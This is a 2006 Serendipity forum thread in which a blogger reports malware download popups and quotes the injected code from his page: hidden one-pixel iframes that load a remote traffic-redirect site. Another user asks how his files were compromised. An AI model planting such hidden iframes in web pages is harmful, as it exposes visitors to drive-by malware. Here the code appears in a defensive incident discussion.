Serendipity Forums

Posted: **Fri Mar 24, 2006 2:45 am**

I'm running Serendipity 0.9-beta1 and PHP 4.3.11 on a hosted server, and when I go to my page, I get a whole bunch of popups to download 'app.wmf'. When I check out the source to my page, I have this at the beginning:

Code: Select all

<iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe><iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe>

Seems to be some sort of a redirect to apokalipsis.biz? And also click.hotlog.ru. I haven't looked into it very far yet, as I'm making a copy of everything before I start messing with it. Has anyone see this before? I'll post a link to my blog as long as everyone promises not to go there with IE

Thanks,
Paladin

Posted: **Fri Mar 24, 2006 3:33 am**

Heh, seems it's probably directly related to what I did because of this:

http://www.s9y.org/forums/viewtopic.php ... ght=#14519

Made the Smarty/libs dir 777. Oops. Live and learn I guess. Just deleted it and replaced it with the directory out of the latest release (and made it 555), since I don't have the old beta release around. Probably should replace the rest of the files, but for now it seems to work fine. Hope my mistakes help someone

Thanks!

Posted: **Fri Mar 24, 2006 1:03 pm**

Hi!

Hm, where did the snippet then come from? Was it injected into your Smarty files or templates?

If the code was inside of the template or smarty files it means someone hacked your webspace to gain file access; this could happen again in the future if not properly paid attention to. Are you hosted on a server with many other sites? Are you using any other PHP/CGI applications on your host?

Regards,
Garvin

Serendipity Forums

Hacked?

Hacked?

Found it

Re: Found it